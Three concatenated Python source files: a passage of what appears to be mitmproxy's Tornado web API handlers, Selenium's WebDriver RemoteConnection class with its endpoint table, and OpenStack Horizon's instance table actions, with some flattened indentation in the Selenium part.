        self.flow.backup()
        message = getattr(self.flow, message)
        message.content = self.filecontents
        self.view.update(self.flow)
    def get(self, flow_id, message):
        """Download the raw content of the flow's request or response."""
        message = getattr(self.flow, message)
        if not message.raw_content:
            raise APIError(400, "No content.")
        content_encoding = message.headers.get("Content-Encoding", None)
        if content_encoding:
            content_encoding = re.sub(r"[^\w]", "", content_encoding)
            self.set_header("Content-Encoding", content_encoding)
        original_cd = message.headers.get("Content-Disposition", None)
        filename = None
        if original_cd:
            # Raw string: "\w" in a non-raw literal is an invalid escape
            # sequence (DeprecationWarning; SyntaxWarning on newer CPython).
            filename = re.search(r'filename=([-\w" .()]+)', original_cd)
            if filename:
                filename = filename.group(1)
        if not filename:
            filename = self.flow.request.path.split("?")[0].split("/")[-1]
        # Strip everything outside a safe character set to prevent header injection.
        filename = re.sub(r'[^-\w" .()]', "", filename)
        cd = "attachment; filename={}".format(filename)
        self.set_header("Content-Disposition", cd)
        self.set_header("Content-Type", "application/text")
        self.set_header("X-Content-Type-Options", "nosniff")
        self.set_header("X-Frame-Options", "DENY")
        self.write(message.raw_content)
class FlowContentView(RequestHandler):
    def get(self, flow_id, message, content_view):
        """Render the message body through the named content view."""
        message = getattr(self.flow, message)
        description, lines, error = contentviews.get_message_content_view(
            content_view.replace('_', ' '), message
        )
        # TODO: surface `error` in the event log instead of dropping it.
        self.write({"lines": list(lines), "description": description})
class Events(RequestHandler):
    def get(self):
        """Return the master's event log, serialized for the frontend."""
        entries = [logentry_to_json(entry) for entry in self.master.events.data]
        self.write(entries)
class Settings(RequestHandler):
    def get(self):
        """Return the subset of master options exposed to the frontend."""
        self.write(dict(
            version=version.VERSION,
            mode=str(self.master.options.mode),
            intercept=self.master.options.intercept,
            showhost=self.master.options.showhost,
            no_upstream_cert=self.master.options.no_upstream_cert,
            rawtcp=self.master.options.rawtcp,
            http2=self.master.options.http2,
            websocket=self.master.options.websocket,
            anticache=self.master.options.anticache,
            anticomp=self.master.options.anticomp,
            stickyauth=self.master.options.stickyauth,
            stickycookie=self.master.options.stickycookie,
            stream=self.master.options.stream_large_bodies,
            contentViews=[v.name.replace(' ', '_') for v in contentviews.views],
            listen_host=self.master.options.listen_host,
            listen_port=self.master.options.listen_port,
        ))
    def put(self):
        """Update master options, rejecting anything outside the whitelist."""
        update = self.json
        # Only options that are safe to change from the web UI.
        option_whitelist = {
            "intercept", "showhost", "no_upstream_cert",
            "rawtcp", "http2", "websocket", "anticache", "anticomp",
            "stickycookie", "stickyauth", "stream_large_bodies"
        }
        for k in update:
            if k not in option_whitelist:
                raise APIError(400, "Unknown setting {}".format(k))
        self.master.options.update(**update)
class Application(tornado.web.Application):
    """Tornado application wiring URL routes to the handlers above."""
    def __init__(self, master, debug):
        self.master = master
        # Route table: REST endpoints plus the /updates websocket.
        handlers = [
            (r"/", IndexHandler),
            (r"/filter-help", FilterHelp),
            (r"/updates", ClientConnection),
            (r"/events", Events),
            (r"/flows", Flows),
            (r"/flows/dump", DumpFlows),
            (r"/flows/resume", ResumeFlows),
            (r"/flows/kill", KillFlows),
            (r"/flows/(?P<flow_id>[0-9a-f\-]+)", FlowHandler),
            (r"/flows/(?P<flow_id>[0-9a-f\-]+)/resume", ResumeFlow),
            (r"/flows/(?P<flow_id>[0-9a-f\-]+)/kill", KillFlow),
            (r"/flows/(?P<flow_id>[0-9a-f\-]+)/duplicate", DuplicateFlow),
            (r"/flows/(?P<flow_id>[0-9a-f\-]+)/replay", ReplayFlow),
            (r"/flows/(?P<flow_id>[0-9a-f\-]+)/revert", RevertFlow),
            (r"/flows/(?P<flow_id>[0-9a-f\-]+)/(?P<message>request|response)/content", FlowContent),
            (
                r"/flows/(?P<flow_id>[0-9a-f\-]+)/(?P<message>request|response)/content/(?P<content_view>[0-9a-zA-Z\-\_]+)",
                FlowContentView),
            (r"/settings", Settings),
            (r"/clear", ClearAll),
        ]
        settings = dict(
            template_path=os.path.join(os.path.dirname(__file__), "templates"),
            static_path=os.path.join(os.path.dirname(__file__), "static"),
            xsrf_cookies=True,
            # A fresh secret per process: XSRF cookies are invalidated on restart.
            cookie_secret=os.urandom(256),
            debug=debug,
            autoreload=False,
        )
        super().__init__(handlers, **settings)
| |
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import socket
import string
import base64
try:
import http.client as httplib
from urllib import request as url_request
from urllib import parse
except ImportError: # above is available in py3+, below is py2.7
import httplib as httplib
import urllib2 as url_request
import urlparse as parse
from .command import Command
from .errorhandler import ErrorCode
from . import utils
LOGGER = logging.getLogger(__name__)
class Request(url_request.Request):
    """
    Extends the url_request.Request to support all HTTP request types.
    """

    def __init__(self, url, data=None, method=None):
        """
        Initialise a new HTTP request.

        :Args:
         - url - String for the URL to send the request to.
         - data - Data to send with the request.
         - method - HTTP method; defaults to POST when data is given and
           GET otherwise. For methods other than POST/PUT, data is dropped.
        """
        if method is None:
            # Conditional expression instead of the legacy "x and a or b"
            # idiom, which silently misbehaves when `a` is falsy.
            method = 'POST' if data is not None else 'GET'
        elif method != 'POST' and method != 'PUT':
            # Only POST and PUT requests may carry a body.
            data = None
        self._method = method
        url_request.Request.__init__(self, url, data=data)

    def get_method(self):
        """
        Returns the HTTP method used by this request.
        """
        return self._method
class Response(object):
    """A minimal HTTP response wrapper around a body file object."""

    def __init__(self, fp, code, headers, url):
        """
        Initialise a new Response.

        :Args:
         - fp - The response body file object.
         - code - The HTTP status code returned by the server.
         - headers - A dictionary of headers returned by the server.
         - url - URL of the retrieved resource represented by this Response.
        """
        self.fp = fp
        # Expose the body's read() directly on the response.
        self.read = fp.read
        self.code = code
        self.headers = headers
        self.url = url

    def close(self):
        """Drop the references to the response body file object."""
        self.read = None
        self.fp = None

    def info(self):
        """Return the response headers."""
        return self.headers

    def geturl(self):
        """Return the URL of the resource this response represents."""
        return self.url
class HttpErrorHandler(url_request.HTTPDefaultErrorHandler):
    """
    A custom HTTP error handler.

    Used to return Response objects instead of raising an HTTPError exception.
    """

    def http_error_default(self, req, fp, code, msg, headers):
        """
        Default HTTP error handler.

        :Args:
         - req - The original Request object.
         - fp - The response body file object.
         - code - The HTTP status code returned by the server.
         - msg - The HTTP status message returned by the server.
         - headers - The response headers.

        :Returns:
          A new Response object.
        """
        # Wrap the error response instead of raising, so callers handle
        # error statuses through the normal Response path.
        return Response(fp, code, headers, req.get_full_url())
class RemoteConnection(object):
"""A connection with the Remote WebDriver server.
Communicates with the server using the WebDriver wire protocol:
https://github.com/SeleniumHQ/selenium/wiki/JsonWireProtocol"""
_timeout = socket._GLOBAL_DEFAULT_TIMEOUT
@classmethod
def get_timeout(cls):
"""
:Returns:
Timeout value in seconds for all http requests made to the Remote Connection
"""
return None if cls._timeout == socket._GLOBAL_DEFAULT_TIMEOUT else cls._timeout
    @classmethod
    def set_timeout(cls, timeout):
        """
        Override the default timeout

        :Args:
         - timeout - timeout value for http requests in seconds
        """
        # Class-level: affects every RemoteConnection instance.
        cls._timeout = timeout
    @classmethod
    def reset_timeout(cls):
        """
        Reset the http request timeout to socket._GLOBAL_DEFAULT_TIMEOUT
        """
        # Restores the sentinel so get_timeout() reports None again.
        cls._timeout = socket._GLOBAL_DEFAULT_TIMEOUT
def __init__(self, remote_server_addr, keep_alive=False, resolve_ip=True):
# Attempt to resolve the hostname and get an IP address.
self.keep_alive = keep_alive
parsed_url = parse.urlparse(remote_server_addr)
self._hostname = parsed_url.hostname
addr = ""
if parsed_url.hostname and resolve_ip:
try:
netloc = socket.gethostbyname(parsed_url.hostname)
addr = netloc
if parsed_url.port:
netloc += ':%d' % parsed_url.port
if parsed_url.username:
auth = parsed_url.username
if parsed_url.password:
auth += ':%s' % parsed_url.password
netloc = '%s@%s' % (auth, netloc)
remote_server_addr = parse.urlunparse(
(parsed_url.scheme, netloc, parsed_url.path,
parsed_url.params, parsed_url.query, parsed_url.fragment))
except socket.gaierror:
LOGGER.info('Could not get IP address for host: %s' % parsed_url.hostname)
self._url = remote_server_addr
if keep_alive:
self._conn = httplib.HTTPConnection(
str(addr), str(parsed_url.port), timeout=self._timeout)
self._commands = {
Command.STATUS: ('GET', '/status'),
Command.NEW_SESSION: ('POST', '/session'),
Command.GET_ALL_SESSIONS: ('GET', '/sessions'),
Command.QUIT: ('DELETE', '/session/$sessionId'),
Command.GET_CURRENT_WINDOW_HANDLE:
('GET', '/session/$sessionId/window_handle'),
Command.GET_WINDOW_HANDLES:
('GET', '/session/$sessionId/window_handles'),
Command.GET: ('POST', '/session/$sessionId/url'),
Command.GO_FORWARD: ('POST', '/session/$sessionId/forward'),
Command.GO_BACK: ('POST', '/session/$sessionId/back'),
Command.REFRESH: ('POST', '/session/$sessionId/refresh'),
Command.EXECUTE_SCRIPT: ('POST', '/session/$sessionId/execute'),
Command.GET_CURRENT_URL: ('GET', '/session/$sessionId/url'),
Command.GET_TITLE: ('GET', '/session/$sessionId/title'),
Command.GET_PAGE_SOURCE: ('GET', '/session/$sessionId/source'),
Command.SCREENSHOT: ('GET', '/session/$sessionId/screenshot'),
Command.ELEMENT_SCREENSHOT: ('GET', '/session/$sessionId/screenshot/$id'),
Command.FIND_ELEMENT: ('POST', '/session/$sessionId/element'),
Command.FIND_ELEMENTS: ('POST', '/session/$sessionId/elements'),
Command.GET_ACTIVE_ELEMENT:
('POST', '/session/$sessionId/element/active'),
Command.FIND_CHILD_ELEMENT:
('POST', '/session/$sessionId/element/$id/element'),
Command.FIND_CHILD_ELEMENTS:
('POST', '/session/$sessionId/element/$id/elements'),
Command.CLICK_ELEMENT: ('POST', '/session/$sessionId/element/$id/click'),
Command.CLEAR_ELEMENT: ('POST', '/session/$sessionId/element/$id/clear'),
Command.SUBMIT_ELEMENT: ('POST', '/session/$sessionId/element/$id/submit'),
Command.GET_ELEMENT_TEXT: ('GET', '/session/$sessionId/element/$id/text'),
Command.SEND_KEYS_TO_ELEMENT:
('POST', '/session/$sessionId/element/$id/value'),
Command.SEND_KEYS_TO_ACTIVE_ELEMENT:
('POST', '/session/$sessionId/keys'),
Command.UPLOAD_FILE: ('POST', "/session/$sessionId/file"),
Command.GET_ELEMENT_VALUE:
('GET', '/session/$sessionId/element/$id/value'),
Command.GET_ELEMENT_TAG_NAME:
('GET', '/session/$sessionId/element/$id/name'),
Command.IS_ELEMENT_SELECTED:
('GET', '/session/$sessionId/element/$id/selected'),
Command.SET_ELEMENT_SELECTED:
('POST', '/session/$sessionId/element/$id/selected'),
Command.IS_ELEMENT_ENABLED:
('GET', '/session/$sessionId/element/$id/enabled'),
Command.IS_ELEMENT_DISPLAYED:
('GET', '/session/$sessionId/element/$id/displayed'),
Command.GET_ELEMENT_LOCATION:
('GET', '/session/$sessionId/element/$id/location'),
Command.GET_ELEMENT_LOCATION_ONCE_SCROLLED_INTO_VIEW:
('GET', '/session/$sessionId/element/$id/location_in_view'),
Command.GET_ELEMENT_SIZE:
('GET', '/session/$sessionId/element/$id/size'),
Command.GET_ELEMENT_RECT:
('GET', '/session/$sessionId/element/$id/rect'),
Command.GET_ELEMENT_ATTRIBUTE:
('GET', '/session/$sessionId/element/$id/attribute/$name'),
Command.ELEMENT_EQUALS:
('GET', '/session/$sessionId/element/$id/equals/$other'),
Command.GET_ALL_COOKIES: ('GET', '/session/$sessionId/cookie'),
Command.ADD_COOKIE: ('POST', '/session/$sessionId/cookie'),
Command.DELETE_ALL_COOKIES:
('DELETE', '/session/$sessionId/cookie'),
Command.DELETE_COOKIE:
('DELETE', '/session/$sessionId/cookie/$name'),
Command.SWITCH_TO_FRAME: ('POST', '/session/$sessionId/frame'),
Command.SWITCH_TO_PARENT_FRAME: ('POST', '/session/$sessionId/frame/parent'),
Command.SWITCH_TO_WINDOW: ('POST', '/session/$sessionId/window'),
Command.CLOSE: ('DELETE', '/session/$sessionId/window'),
Command.GET_ELEMENT_VALUE_OF_CSS_PROPERTY:
('GET', '/session/$sessionId/element/$id/css/$propertyName'),
Command.IMPLICIT_WAIT:
('POST', '/session/$sessionId/timeouts/implicit_wait'),
Command.EXECUTE_ASYNC_SCRIPT: ('POST', '/session/$sessionId/execute_async'),
Command.SET_SCRIPT_TIMEOUT:
('POST', '/session/$sessionId/timeouts/async_script'),
Command.SET_TIMEOUTS:
('POST', '/session/$sessionId/timeouts'),
Command.DISMISS_ALERT:
('POST', '/session/$sessionId/dismiss_alert'),
Command.ACCEPT_ALERT:
('POST', '/session/$sessionId/accept_alert'),
Command.SET_ALERT_VALUE:
('POST', '/session/$sessionId/alert_text'),
Command.GET_ALERT_TEXT:
('GET', '/session/$sessionId/alert_text'),
Command.SET_ALERT_CREDENTIALS:
('POST', '/session/$sessionId/alert/credentials'),
Command.CLICK:
('POST', '/session/$sessionId/click'),
Command.DOUBLE_CLICK:
('POST', '/session/$sessionId/doubleclick'),
Command.MOUSE_DOWN:
('POST', '/session/$sessionId/buttondown'),
Command.MOUSE_UP:
('POST', '/session/$sessionId/buttonup'),
Command.MOVE_TO:
('POST', '/session/$sessionId/moveto'),
Command.GET_WINDOW_SIZE:
('GET', '/session/$sessionId/window/$windowHandle/size'),
Command.W3C_GET_WINDOW_SIZE:
('GET', '/session/$sessionId/window/size'),
Command.SET_WINDOW_SIZE:
('POST', '/session/$sessionId/window/$windowHandle/size'),
Command.W3C_SET_WINDOW_SIZE:
('POST', '/session/$sessionId/window/size'),
Command.GET_WINDOW_POSITION:
('GET', '/session/$sessionId/window/$windowHandle/position'),
Command.SET_WINDOW_POSITION:
('POST', '/session/$sessionId/window/$windowHandle/position'),
Command.MAXIMIZE_WINDOW:
('POST', '/session/$sessionId/window/$windowHandle/maximize'),
Command.W3C_MAXIMIZE_WINDOW:
('POST', '/session/$sessionId/window/maximize'),
Command.SET_SCREEN_ORIENTATION:
('POST', '/session/$sessionId/orientation'),
Command.GET_SCREEN_ORIENTATION:
('GET', '/session/$sessionId/orientation'),
Command.SINGLE_TAP:
('POST', '/session/$sessionId/touch/click'),
Command.TOUCH_DOWN:
('POST', '/session/$sessionId/touch/down'),
Command.TOUCH_UP:
('POST', '/session/$sessionId/touch/up'),
Command.TOUCH_MOVE:
('POST', '/session/$sessionId/touch/move'),
Command.TOUCH_SCROLL:
('POST', '/session/$sessionId/touch/scroll'),
Command.DOUBLE_TAP:
('POST', '/session/$sessionId/touch/doubleclick'),
Command.LONG_PRESS:
('POST', '/session/$sessionId/touch/longclick'),
Command.FLICK:
('POST', '/session/$sessionId/touch/flick'),
Command.EXECUTE_SQL:
('POST', '/session/$sessionId/execute_sql'),
Command.GET_LOCATION:
('GET', '/session/$sessionId/location'),
Command.SET_LOCATION:
('POST', '/session/$sessionId/location'),
Command.GET_APP_CACHE:
('GET', '/session/$sessionId/application_cache'),
Command.GET_APP_CACHE_STATUS:
('GET', '/session/$sessionId/application_cache/status'),
Command.CLEAR_APP_CACHE:
('DELETE', '/session/$sessionId/application_cache/clear'),
Command.GET_NETWORK_CONNECTION:
('GET', '/session/$sessionId/network_connection'),
Command.SET_NETWORK_CONNECTION:
('POST', '/session/$sessionId/network_connection'),
Command.GET_LOCAL_STORAGE_ITEM:
('GET', '/session/$sessionId/local_storage/key/$key'),
Command.REMOVE_LOCAL_STORAGE_ITEM:
('DELETE', '/session/$sessionId/local_storage/key/$key'),
Command.GET_LOCAL_STORAGE_KEYS:
('GET', '/session/$sessionId/local_storage'),
Command.SET_LOCAL_STORAGE_ITEM:
('POST', '/session/$sessionId/local_storage'),
Command.CLEAR_LOCAL_STORAGE:
('DELETE', '/session/$sessionId/local_storage'),
Command.GET_LOCAL_STORAGE_SIZE:
('GET', '/session/$sessionId/local_storage/size'),
Command.GET_SESSION_STORAGE_ITEM:
('GET', '/session/$sessionId/session_storage/key/$key'),
Command.REMOVE_SESSION_STORAGE_ITEM:
('DELETE', '/session/$sessionId/session_storage/key/$key'),
Command.GET_SESSION_STORAGE_KEYS:
('GET', '/session/$sessionId/session_storage'),
Command.SET_SESSION_STORAGE_ITEM:
('POST', '/session/$sessionId/session_storage'),
Command.CLEAR_SESSION_STORAGE:
('DELETE', '/session/$sessionId/session_storage'),
Command.GET_SESSION_STORAGE_SIZE:
('GET', '/session/$sessionId/session_storage/size'),
Command.GET_LOG:
('POST', '/session/$sessionId/log'),
Command.GET_AVAILABLE_LOG_TYPES:
('GET', '/session/$sessionId/log/types'),
Command.CURRENT_CONTEXT_HANDLE:
('GET', '/session/$sessionId/context'),
Command.CONTEXT_HANDLES:
('GET', '/session/$sessionId/contexts'),
Command.SWITCH_TO_CONTEXT:
('POST', '/session/$sessionId/context'),
}
def execute(self, command, params):
"""
Send a command to the remote server.
Any path subtitutions required for the URL mapped to the command should be
included in the command parameters.
:Args:
- command - A string specifying the command to execute.
- params - A dictionary of named parameters to send with the command as
its JSON payload.
"""
command_info = self._commands[command]
assert command_info is not None, 'Unrecognised command %s' % command
data = utils.dump_json(params)
path = string.Template(command_info[1]).substitute(params)
url = '%s%s' % (self._url, path)
return self._request(command_info[0], url, body=data)
def _request(self, method, url, body=None):
"""
Send an HTTP request to the remote server.
:Args:
- method - A string for the HTTP method to send the request with.
- url - A string for the URL to send the request to.
- body - A string for request body. Ignored unless method is POST or PUT.
:Returns:
A dictionary with the server's parsed JSON response.
"""
LOGGER.debug('%s %s %s' % (method, url, body))
parsed_url = parse.urlparse(url)
if self.keep_alive:
headers = {"Connection": 'keep-alive', method: parsed_url.path,
"User-Agent": "Python http auth",
"Content-type": "application/json;charset=\"UTF-8\"",
"Accept": "application/json",
"Host": self._hostname}
if parsed_url.username:
auth = base64.standard_b64encode('%s:%s' %
(parsed_url.username, parsed_url.password)).replace('\n', '')
headers["Authorization"] = "Basic %s" % auth
if body and method != 'POST' and method != 'PUT':
body = None
try:
self._conn.request(method, parsed_url.path, body, headers)
resp = self._conn.getresponse()
except (httplib.HTTPException, socket.error):
self._conn.close()
raise
statuscode = resp.status
else:
password_manager = None
if parsed_url.username:
netloc = parsed_url.hostname
if parsed_url.port:
netloc += ":%s" % parsed_url.port
cleaned_url = parse.urlunparse((parsed_url.scheme,
netloc,
parsed_url.path,
parsed_url.params,
parsed_url.query,
parsed_url.fragment))
password_manager = url_request.HTTPPasswordMgrWithDefaultRealm()
password_manager.add_password(None,
"%s://%s" % (parsed_url.scheme, netloc),
parsed_url.username,
parsed_url.password)
request = Request(cleaned_url, data=body.encode('utf-8'), method=method)
else:
request = Request(url, data=body.encode('utf-8'), method=method)
request.add_header('Accept', 'application/json')
request.add_header('Content-Type', 'application/json;charset=UTF-8')
request.add_header('Host', self._hostname)
if password_manager:
opener = url_request.build_opener(url_request.HTTPRedirectHandler(),
HttpErrorHandler(),
url_request.HTTPBasicAuthHandler(password_manager))
else:
opener = url_request.build_opener(url_request.HTTPRedirectHandler(),
HttpErrorHandler())
resp = opener.open(request, timeout=self._timeout)
statuscode = resp.code
if not hasattr(resp, 'getheader'):
if hasattr(resp.headers, 'getheader'):
resp.getheader = lambda x: resp.headers.getheader(x)
elif hasattr(resp.headers, 'get'):
resp.getheader = lambda x: resp.headers.get(x)
data = resp.read()
try:
if 300 <= statuscode < 304:
return self._request('GET', resp.getheader('location'))
body = data.decode('utf-8').replace('\x00', '').strip()
if 399 < statuscode < 500:
return {'status': statuscode, 'value': body}
content_type = []
if resp.getheader('Content-Type') is not None:
content_type = resp.getheader('Content-Type').split(';')
if not any([x.startswith('image/png') for x in content_type]):
try:
data = utils.load_json(body.strip())
except ValueError:
if 199 < statuscode < 300:
status = ErrorCode.SUCCESS
else:
status = ErrorCode.UNKNOWN_ERROR
return {'status': status, 'value': body.strip()}
assert type(data) is dict, (
'Invalid server response body: %s' % body)
# Some of the drivers incorrectly return a response
# with no 'value' field when they should return null.
if 'value' not in data:
data['value'] = None
return data
else:
data = {'status': 0, 'value': body.strip()}
return data
finally:
LOGGER.debug("Finished Request")
resp.close()
| |
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.conf import settings
from django.core import urlresolvers
from django.http import HttpResponse # noqa
from django import shortcuts
from django import template
from django.template.defaultfilters import title # noqa
from django.utils.http import urlencode
from django.utils.translation import npgettext_lazy
from django.utils.translation import pgettext_lazy
from django.utils.translation import string_concat # noqa
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
import six
from horizon import conf
from horizon import exceptions
from horizon import messages
from horizon import tables
from horizon.templatetags import sizeformat
from horizon.utils import filters
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.access_and_security.floating_ips \
import workflows
from openstack_dashboard.dashboards.project.instances import tabs
from openstack_dashboard.dashboards.project.instances.workflows \
import resize_instance
from openstack_dashboard.dashboards.project.instances.workflows \
import update_instance
from openstack_dashboard import policy
LOG = logging.getLogger(__name__)
# Instance states in which the corresponding table actions are offered.
ACTIVE_STATES = ("ACTIVE",)
VOLUME_ATTACH_READY_STATES = ("ACTIVE", "SHUTOFF")
SNAPSHOT_READY_STATES = ("ACTIVE", "SHUTOFF", "PAUSED", "SUSPENDED")
# Display labels for the nova "OS-EXT-STS:power_state" integer values.
POWER_STATES = {
    0: "NO STATE",
    1: "RUNNING",
    2: "BLOCKED",
    3: "PAUSED",
    4: "SHUTDOWN",
    5: "SHUTOFF",
    6: "CRASHED",
    7: "SUSPENDED",
    8: "FAILED",
    9: "BUILDING",
}
# Indices into the label tuples returned by the toggle actions'
# action_present()/action_past() (see TogglePause / ToggleSuspend).
PAUSE = 0
UNPAUSE = 1
SUSPEND = 0
RESUME = 1
def is_deleting(instance):
    """Return True when *instance*'s task state reports it is being deleted.

    Missing or empty task states count as "not deleting".
    """
    task_state = getattr(instance, "OS-EXT-STS:task_state", None)
    return bool(task_state) and task_state.lower() == "deleting"
class TerminateInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Batch table action that deletes the selected instances via nova."""
    name = "terminate"
    classes = ("btn-danger",)
    icon = "remove"
    # Policy rule checked (by the mixin) before the action is offered.
    policy_rules = (("compute", "compute:delete"),)
    help_text = _("Terminated instances are not recoverable.")
    @staticmethod
    def action_present(count):
        """Return the pluralised button label."""
        return ungettext_lazy(
            u"Terminate Instance",
            u"Terminate Instances",
            count
        )
    @staticmethod
    def action_past(count):
        """Return the pluralised label shown after the action is queued."""
        return ungettext_lazy(
            u"Scheduled termination of Instance",
            u"Scheduled termination of Instances",
            count
        )
    def allowed(self, request, instance=None):
        """Allow terminate action if instance not currently being deleted."""
        return not is_deleting(instance)
    def action(self, request, obj_id):
        # Delete a single instance by id; the framework iterates the batch.
        api.nova.server_delete(request, obj_id)
class RebootInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Batch action performing a hard reboot of the selected instances."""
    name = "reboot"
    classes = ('btn-danger', 'btn-reboot')
    policy_rules = (("compute", "compute:reboot"),)
    help_text = _("Restarted instances will lose any data"
                  " not saved in persistent storage.")

    @staticmethod
    def action_present(count):
        """Return the pluralised button label."""
        return ungettext_lazy(
            u"Hard Reboot Instance",
            u"Hard Reboot Instances",
            count
        )

    @staticmethod
    def action_past(count):
        """Return the pluralised post-action label."""
        return ungettext_lazy(
            u"Hard Rebooted Instance",
            u"Hard Rebooted Instances",
            count
        )

    def allowed(self, request, instance=None):
        # Table-level check (no row bound): always allowed.
        if instance is None:
            return True
        rebootable = (instance.status in ACTIVE_STATES
                      or instance.status == 'SHUTOFF')
        return rebootable and not is_deleting(instance)

    def action(self, request, obj_id):
        # Hard reboot power-cycles the server.
        api.nova.server_reboot(request, obj_id, soft_reboot=False)
class SoftRebootInstance(RebootInstance):
    """Variant of RebootInstance that requests a soft (OS-level) reboot.

    Inherits the allowed() logic and styling from RebootInstance.
    """
    name = "soft_reboot"
    @staticmethod
    def action_present(count):
        """Return the pluralised button label."""
        return ungettext_lazy(
            u"Soft Reboot Instance",
            u"Soft Reboot Instances",
            count
        )
    @staticmethod
    def action_past(count):
        """Return the pluralised post-action label."""
        return ungettext_lazy(
            u"Soft Rebooted Instance",
            u"Soft Rebooted Instances",
            count
        )
    def action(self, request, obj_id):
        # soft_reboot=True asks the guest OS to restart rather than
        # power-cycling the server.
        api.nova.server_reboot(request, obj_id, soft_reboot=True)
class TogglePause(tables.BatchAction):
    """Batch action that pauses running instances and unpauses paused ones.

    allowed() records the current state on the action instance so that
    action() and the label machinery know which direction to toggle.
    """
    name = "pause"
    icon = "pause"

    @staticmethod
    def action_present(count):
        # (pause label, unpause label) -- indexed by current_present_action.
        return (
            ungettext_lazy(u"Pause Instance", u"Pause Instances", count),
            ungettext_lazy(u"Resume Instance", u"Resume Instances", count),
        )

    @staticmethod
    def action_past(count):
        # (paused label, resumed label) -- indexed by current_past_action.
        return (
            ungettext_lazy(u"Paused Instance", u"Paused Instances", count),
            ungettext_lazy(u"Resumed Instance", u"Resumed Instances", count),
        )

    def allowed(self, request, instance=None):
        if not api.nova.extension_supported('AdminActions', request):
            return False
        if not instance:
            return False
        # Remember the direction of the toggle for action() below.
        self.paused = instance.status == "PAUSED"
        if self.paused:
            self.current_present_action = UNPAUSE
            policy = (("compute", "compute_extension:admin_actions:unpause"),)
        else:
            self.current_present_action = PAUSE
            policy = (("compute", "compute_extension:admin_actions:pause"),)
        has_permission = True
        policy_check = getattr(settings, "POLICY_CHECK_FUNCTION", None)
        if policy_check:
            has_permission = policy_check(
                policy, request,
                target={'project_id': getattr(instance, 'tenant_id', None)})
        if not has_permission:
            return False
        if not (instance.status in ACTIVE_STATES or self.paused):
            return False
        return not is_deleting(instance)

    def action(self, request, obj_id):
        if self.paused:
            api.nova.server_unpause(request, obj_id)
            self.current_past_action = UNPAUSE
        else:
            api.nova.server_pause(request, obj_id)
            self.current_past_action = PAUSE
class ToggleSuspend(tables.BatchAction):
    """Batch action that suspends active instances and resumes suspended ones.

    allowed() caches the current state on the action instance so action()
    and the label machinery know which direction to toggle.
    """
    name = "suspend"
    classes = ("btn-suspend",)
    @staticmethod
    def action_present(count):
        # (suspend label, resume label) -- indexed by current_present_action.
        return (
            ungettext_lazy(
                u"Suspend Instance",
                u"Suspend Instances",
                count
            ),
            ungettext_lazy(
                u"Resume Instance",
                u"Resume Instances",
                count
            ),
        )
    @staticmethod
    def action_past(count):
        # (suspended label, resumed label) -- indexed by current_past_action.
        return (
            ungettext_lazy(
                u"Suspended Instance",
                u"Suspended Instances",
                count
            ),
            ungettext_lazy(
                u"Resumed Instance",
                u"Resumed Instances",
                count
            ),
        )
    def allowed(self, request, instance=None):
        """Offer the action only when the AdminActions extension exists and
        the instance is active (suspendable) or already suspended."""
        if not api.nova.extension_supported('AdminActions',
                                            request):
            return False
        if not instance:
            return False
        # Remember the toggle direction for action() below.
        self.suspended = instance.status == "SUSPENDED"
        if self.suspended:
            self.current_present_action = RESUME
            policy = (("compute", "compute_extension:admin_actions:resume"),)
        else:
            self.current_present_action = SUSPEND
            policy = (("compute", "compute_extension:admin_actions:suspend"),)
        has_permission = True
        policy_check = getattr(settings, "POLICY_CHECK_FUNCTION", None)
        if policy_check:
            has_permission = policy_check(
                policy, request,
                target={'project_id': getattr(instance, 'tenant_id', None)})
        return (has_permission
                and (instance.status in ACTIVE_STATES or self.suspended)
                and not is_deleting(instance))
    def action(self, request, obj_id):
        if self.suspended:
            api.nova.server_resume(request, obj_id)
            self.current_past_action = RESUME
        else:
            api.nova.server_suspend(request, obj_id)
            self.current_past_action = SUSPEND
class LaunchLink(tables.LinkAction):
    """Table-header link opening the launch-instance workflow.

    allowed() doubles as a quota check: when the tenant's instance, core
    or RAM quota is exhausted the button is disabled and its label gets a
    "(Quota exceeded)" suffix, but the link itself is always displayed.
    """
    name = "launch"
    verbose_name = _("Launch Instance")
    url = "horizon:project:instances:launch"
    classes = ("ajax-modal", "btn-launch")
    icon = "cloud-upload"
    policy_rules = (("compute", "compute:create"),)
    ajax = True
    def __init__(self, attrs=None, **kwargs):
        # preempt=True makes the table framework evaluate this action early.
        kwargs['preempt'] = True
        super(LaunchLink, self).__init__(attrs, **kwargs)
    def allowed(self, request, datum):
        try:
            limits = api.nova.tenant_absolute_limits(request, reserved=True)
            instances_available = limits['maxTotalInstances'] \
                - limits['totalInstancesUsed']
            cores_available = limits['maxTotalCores'] \
                - limits['totalCoresUsed']
            ram_available = limits['maxTotalRAMSize'] - limits['totalRAMUsed']
            if instances_available <= 0 or cores_available <= 0 \
                    or ram_available <= 0:
                # Disable the button and flag the quota problem in its label.
                if "disabled" not in self.classes:
                    self.classes = [c for c in self.classes] + ['disabled']
                    self.verbose_name = string_concat(self.verbose_name, ' ',
                                                      _("(Quota exceeded)"))
            else:
                # Quota available again: restore the label and re-enable.
                self.verbose_name = _("Launch Instance")
                classes = [c for c in self.classes if c != "disabled"]
                self.classes = classes
        except Exception:
            LOG.exception("Failed to retrieve quota information")
            # If we can't get the quota information, leave it to the
            # API to check when launching
        return True  # The action should always be displayed
    def single(self, table, request, object_id=None):
        # AJAX refresh hook: re-run the quota check, then re-render the button.
        self.allowed(request, None)
        return HttpResponse(self.render())
